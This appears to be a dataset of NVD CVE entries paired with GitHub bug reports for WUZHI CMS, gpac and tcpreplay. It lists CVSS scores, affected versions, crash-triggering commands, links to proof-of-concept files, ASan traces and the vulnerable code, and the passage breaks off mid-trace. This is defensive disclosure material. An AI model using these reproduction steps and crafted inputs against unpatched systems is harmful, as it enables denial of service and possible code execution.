{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/177" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/177" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:*:*:*:*:*:*:*:*", "matchCriteriaId": "3C58F9FA-B88E-47EC-9A52-DD7DC6E88941", "versionEndExcluding": null, "versionEndIncluding": "4.1.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/wuzhicms/wuzhicms/issues/177
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
### Remote Code Execution Vulnerability in WUZHI CMS <= 4.1.0 File extension blacklist bypass when file-upload can cause arbitrarily code execution. ### View Detail [Wuzhicms.RCE.docx](https://github.com/wuzhicms/wuzhicms/files/3255211/Wuzhicms.RCE.docx) hiboy#dbappsecurity.com.cn
Remote Code Execution Vulnerability in WUZHI CMS <= 4.1.0
https://api.github.com/repos/wuzhicms/wuzhicms/issues/177/comments
0
2019-06-04T09:56:39Z
2019-06-05T02:08:07Z
https://github.com/wuzhicms/wuzhicms/issues/177
451,904,122
177
2,601
CVE-2020-19553
2021-09-21T19:15:07.360
Cross Site Scripting (XSS) vlnerability exists in WUZHI CMS up to and including 4.1.0 in the config function in coreframe/app/attachment/libs/class/ckditor.class.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/179" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/179" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:*:*:*:*:*:*:*:*", "matchCriteriaId": "3C58F9FA-B88E-47EC-9A52-DD7DC6E88941", "versionEndExcluding": null, "versionEndIncluding": "4.1.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wuzhicms/wuzhicms/issues/179
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
### Stored Cross-Scripting Vulnerability Vulnerability in WUZHI CMS <=4.1.0 attacker can upload the specific file to the server & it can cause javascript code execution when visited. ### View Detail [Stored Cross-Scripting Vulnerability.docx](https://github.com/wuzhicms/wuzhicms/files/3260135/Stored.Cross-Scripting.Vulnerability.docx) hiboy#dbappsecurity.com.cn
Stored Cross-Scripting Vulnerability Vulnerability in WUZHI CMS <=4.1.0
https://api.github.com/repos/wuzhicms/wuzhicms/issues/179/comments
0
2019-06-05T08:56:04Z
2019-06-06T05:38:18Z
https://github.com/wuzhicms/wuzhicms/issues/179
452,386,675
179
2,602
CVE-2020-23266
2021-09-22T00:15:08.567
An issue was discovered in gpac 0.8.0. The OD_ReadUTF8String function in odf_code.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted media file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1481" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1481" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1481
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [ y] I looked for a similar issue and couldn't find any. - [ y] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 **Describe the bug** A heap-based buffer overflow was discovered in libgpac. The issue is being triggered in the function OD_ReadUTF8String() at odf_code.c **To Reproduce** Steps to reproduce the behavior: 1. Compile according to the default configuration ```bash $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` 2. execute command ```bash MP4Box -hint $poc ``` [poc](https://github.com/14isnot40/vul_discovery/blob/master/OD_ReadUTF8String_hbo) can be found here. **Expected behavior** An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service (DoS) and potentially Information Exposure when the application attempts to process the file. **Screenshots** ASAN Reports ```bash ==42612==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef51 at pc 0x7ffff6eda20b bp 0x7fffffff8b60 sp 0x7fffffff8308 READ of size 2 at 0x60200000ef51 thread T0 #0 0x7ffff6eda20a in __interceptor_strlen (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x7020a) #1 0x79532f in OD_SizeUTF8String odf/odf_code.c:49 #2 0x79532f in gf_odf_size_sup_cid odf/odf_code.c:3208 #3 0x79739d in gf_odf_desc_size odf/odf_codec.c:364 #4 0xac28c0 in iods_Size isomedia/box_code_base.c:2818 #5 0x6aa2f7 in gf_isom_box_size_listing isomedia/box_funcs.c:1588 #6 0x6aa2f7 in gf_isom_box_size isomedia/box_funcs.c:1601 #7 0xac6157 in moov_Size isomedia/box_code_base.c:3833 #8 0x6aa2f7 in gf_isom_box_size_listing isomedia/box_funcs.c:1588 #9 0x6aa2f7 in gf_isom_box_size isomedia/box_funcs.c:1601 #10 0x6e1599 in GetMoovAndMetaSize isomedia/isom_store.c:352 #11 0x6e7a1e in WriteInterleaved isomedia/isom_store.c:1356 #12 0x6e8be9 in WriteToFile isomedia/isom_store.c:1498 #13 0x6c9001 in gf_isom_write isomedia/isom_read.c:483 #14 0x6c9392 in gf_isom_close isomedia/isom_read.c:507 #15 0x429a8e in mp4boxMain (/usr/local/bin/MP4Box+0x429a8e) #16 0x7ffff615e82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #17 0x41d668 in _start (/usr/local/bin/MP4Box+0x41d668) 0x60200000ef51 is located 0 bytes to the right of 1-byte region [0x60200000ef50,0x60200000ef51) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x79525c in OD_ReadUTF8String odf/odf_code.c:40 #2 0x79525c in gf_odf_read_sup_cid odf/odf_code.c:3197 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __interceptor_strlen Shadow bytes around the buggy address: 0x0c047fff9d90: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 01 fa 0x0c047fff9da0: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 00 00 0x0c047fff9db0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9dc0: fa fa 01 fa fa fa 00 00 fa fa 00 00 fa fa 01 fa 0x0c047fff9dd0: fa fa 00 00 fa fa 01 fa fa fa fd fd fa fa fd fa =>0x0c047fff9de0: fa fa fd fd fa fa fd fd fa fa[01]fa fa fa 01 fa 0x0c047fff9df0: fa fa fd fd fa fa 00 00 fa fa 00 04 fa fa 00 00 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==42612==ABORTING [Inferior 1 (process 42612) exited with code 01] ``` **System (please complete the following information):** - OS version : Ubuntu 16.04 - GPAC Version : GPAC 0.8.0-e10d39d-master branch
Heap-buffer-overflow in OD_ReadUTF8String() odf_code.c
https://api.github.com/repos/gpac/gpac/issues/1481/comments
1
2020-05-12T18:18:19Z
2020-06-11T15:01:32Z
https://github.com/gpac/gpac/issues/1481
616,861,182
1,481
2,603
CVE-2020-23267
2021-09-22T00:15:08.623
An issue was discovered in gpac 0.8.0. The gf_hinter_track_process function in isom_hinter_track_process.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted media file
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1479" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1479" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1479
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [ y] I looked for a similar issue and couldn't find any. - [ y] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 **Describe the bug** A heap-based buffer overflow was discovered in libgpac, during the pointer ptr points to the wrong memory area operation. The issue is being triggered in the function gf_hinter_track_process() at isom_hinter_track_process.c. **To Reproduce** Steps to reproduce the behavior: 1. Compile gpac according to the default configuration ```bash ./configure --extra-cflags="-fsanitize=address,undefined -g" --extra-ldflags="-fsanitize=address,undefined -ldl -g" ``` 2. execute command ```bash MP4Box -hint $poc ``` [poc](https://github.com/14isnot40/vul_discovery/blob/master/gf_hinter_track_process_hbo) can be found here. **Expected behavior** An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service (DoS) and potentially Information Exposure when the application attempts to process the file. **Screenshots** ASAN Reports ```bash ==32436==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000e7f9 at pc 0x7ffff44178c2 bp 0x7fffffff8de0 sp 0x7fffffff8dd0 READ of size 1 at 0x60200000e7f9 thread T0 #0 0x7ffff44178c1 in gf_hinter_track_process (/usr/local/lib/libgpac.so.8+0x24ce8c1) #1 0x40e68c in HintFile (/usr/local/bin/MP4Box+0x40e68c) #2 0x419db6 in mp4boxMain (/usr/local/bin/MP4Box+0x419db6) #3 0x7ffff1b9f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x40dc18 in _start (/usr/local/bin/MP4Box+0x40dc18) 0x60200000e7f9 is located 0 bytes to the right of 9-byte region [0x60200000e7f0,0x60200000e7f9) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7ffff3f83fb8 in Media_GetSample (/usr/local/lib/libgpac.so.8+0x203afb8) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 gf_hinter_track_process Shadow bytes around the buggy address: 0x0c047fff9ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9ce0: fa fa fa fa fa fa fa fa fa fa 00 00 fa fa 00 00 =>0x0c047fff9cf0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00[01] 0x0c047fff9d00: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9d10: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9d20: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9d30: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9d40: fa fa fd fd fa fa fd fd fa fa 04 fa fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==32436==ABORTING ``` Possible causes of vulnerabilities is in the function gf_hinter_track_process() at isom_hinter_track_process.c. ```cpp while (remain) { size = 0; v = tkHint->avc_nalu_size; while (v) { size |= (u8) *ptr; ptr++; remain--; v-=1; if (v) size<<=8; } ``` **System (please complete the following information):** - OS version : Ubuntu 16.04 - GPAC Version : GPAC 0.8.0-e10d39d-master branch
Heap buffer overflow in isom_hinter.c:766 in gf_hinter_track_process()
https://api.github.com/repos/gpac/gpac/issues/1479/comments
2
2020-05-12T16:22:14Z
2021-09-27T18:50:43Z
https://github.com/gpac/gpac/issues/1479
616,789,021
1,479
2,604
CVE-2020-23269
2021-09-22T00:15:08.677
An issue was discovered in gpac 0.8.0. The stbl_GetSampleSize function in isomedia/stbl_read.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted media file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1482" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1482" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1482
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [ y] I looked for a similar issue and couldn't find any. - [ y] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 **Describe the bug** A heap-based buffer overflow was discovered in libgpac, during structure GF_SampleSizeBox 'stsz' member 'sizes' points to an invalid address. The issue is being triggered in the function stbl_GetSampleSize() at isomedia/stbl_read.c **To Reproduce** Steps to reproduce the behavior: 1. Compile according to the default configuration ```bash $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` 2. execute command ```bash MP4Box -hint $poc ``` [poc](https://github.com/14isnot40/vul_discovery/blob/master/stbl_GetSampleSize_hbo) can be found here. **Expected behavior** An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service (DoS) and potentially Information Exposure when the application attempts to process the file. **Screenshots** ASAN Reports ```bash ==94786==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61400000fdd0 at pc 0x000000744231 bp 0x7fffffff83c0 sp 0x7fffffff83b0 READ of size 4 at 0x61400000fdd0 thread T0 #0 0x744230 in stbl_GetSampleSize isomedia/stbl_read.c:135 #1 0x717f3d in Media_GetSample isomedia/media.c:418 #2 0x6cd966 in gf_isom_get_sample_info isomedia/isom_read.c:1692 #3 0x912ed8 in gf_media_get_sample_average_infos media_tools/isom_hinter.c:54 #4 0x913d43 in gf_hinter_track_new media_tools/isom_hinter.c:560 #5 0x41e02e in HintFile (/usr/local/bin/MP4Box+0x41e02e) #6 0x429806 in mp4boxMain (/usr/local/bin/MP4Box+0x429806) #7 0x7ffff615e82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #8 0x41d668 in _start (/usr/local/bin/MP4Box+0x41d668) 0x61400000fdd0 is located 0 bytes to the right of 400-byte region [0x61400000fc40,0x61400000fdd0) allocated by thread T0 here: #0 0x7ffff6f02961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961) #1 0x7516dd in stbl_AppendSize isomedia/stbl_write.c:1487 SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/stbl_read.c:135 stbl_GetSampleSize Shadow bytes around the buggy address: 0x0c287fff9f60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c287fff9f70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c287fff9f80: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c287fff9f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c287fff9fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c287fff9fb0: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa 0x0c287fff9fc0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c287fff9fd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c287fff9fe0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c287fff9ff0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c287fffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==94786==ABORTING ``` Possible causes of vulnerabilities structure GF_SampleSizeBox 'stsz' member 'sizes' points to an invalid address ```cpp GF_Err stbl_GetSampleSize(GF_SampleSizeBox *stsz, u32 SampleNumber, u32 *Size) { if (!stsz || !SampleNumber || SampleNumber > stsz->sampleCount) return GF_BAD_PARAM; (*Size) = 0; if (stsz->sampleSize && (stsz->type != GF_ISOM_BOX_TYPE_STZ2)) { (*Size) = stsz->sampleSize; } else if (stsz->sizes) { (*Size) = stsz->sizes[SampleNumber - 1]; } return GF_OK; } ``` **System (please complete the following information):** - OS version : Ubuntu 16.04 - GPAC Version : GPAC 0.8.0-e10d39d-master branch
Heap-buffer-overflow isomedia/stbl_read.c:135 in stbl_GetSampleSize()
https://api.github.com/repos/gpac/gpac/issues/1482/comments
3
2020-05-13T01:17:29Z
2021-09-27T17:40:58Z
https://github.com/gpac/gpac/issues/1482
617,067,875
1,482
2,605
CVE-2020-23273
2021-09-22T00:15:08.727
Heap-buffer overflow in the randomize_iparp function in edit_packet.c. of Tcpreplay v4.3.2 allows attackers to cause a denial of service (DOS) via a crafted pcap.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/579" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/appneta/tcpreplay/issues/579" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:broadcom:tcpreplay:4.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "423E0A54-6122-4B42-B3D1-69D31C3C7CA6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/appneta/tcpreplay/issues/579
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "appneta", "tcpreplay" ]
**Describe the bug** A heap-based buffer overflow was discovered in tcpreplay-edit binary, during the pointer 'ip' dereference operation. The issue is being triggered in the function randomize_iparp at edit_packet.c:1032. **To Reproduce** Steps to reproduce the behavior: 1. Compile tcpreplay according to the default configuration ```bash ./configure CFLAGS="-g -O0 -fsanitize=address" ``` 2. execute command ```bash tcpreplay-edit -r 80:84 -s 20 -b -C -m 1500 -P --oneatatime -i lo $poc ``` [poc](https://github.com/14isnot40/vul_discovery/blob/master/tcpreplay/tcpreplay-edit/pocs/hbo_randomize_iparp) can be found here. **Expected behavior** An attacker can exploit this vulnerability by submitting a malicious pcap that exploits this issue. This will result in a Denial of Service (DoS), potentially Information Exposure when the application attempts to process the file. **Screenshots** ASAN Reports ```bash ==64974==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000edf6 at pc 0x000000425341 bp 0x7fffffffd5d0 sp 0x7fffffffd5c0 READ of size 4 at 0x60300000edf6 thread T0 #0 0x425340 in randomize_iparp /home/test/Desktop/evaulation/tcpreplay/src/tcpedit/edit_packet.c:1032 #1 0x41c71b in tcpedit_packet /home/test/Desktop/evaulation/tcpreplay/src/tcpedit/tcpedit.c:329 #2 0x40963b in send_packets /home/test/Desktop/evaulation/tcpreplay/src/send_packets.c:552 #3 0x418e9a in replay_file /home/test/Desktop/evaulation/tcpreplay/src/replay.c:182 #4 0x417e73 in tcpr_replay_index /home/test/Desktop/evaulation/tcpreplay/src/replay.c:59 #5 0x416de4 in 